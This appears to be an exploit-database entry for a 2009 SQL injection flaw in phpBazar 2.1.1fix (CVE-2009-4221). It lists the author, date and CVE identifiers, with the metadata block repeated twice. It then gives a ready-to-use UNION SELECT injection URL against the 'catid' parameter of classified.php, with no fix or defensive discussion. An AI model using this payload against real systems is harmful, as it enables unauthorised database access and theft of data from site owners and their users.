phpBazar 2.1.1fix - 'cid' SQL Injection
| EKU-ID: 17834 | CVE: OSVDB-60844;CVE-2009-4221 | OSVDB-ID: |
| Author: MizoZ | Published: 2009-11-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17834 | CVE: OSVDB-60844;CVE-2009-4221 | OSVDB-ID: |
| Author: MizoZ | Published: 2009-11-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
/* Author : MizoZ [from MA] Group : EvilWay, evilway[at]mail[dot]com Email : mizozx[at]gmail[dot]com Greetz : Zuka, Dyle !! MABROOK L3IIIIIIIIIID */ The vulnerability is in the $_GET['catid'] , exploit : http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--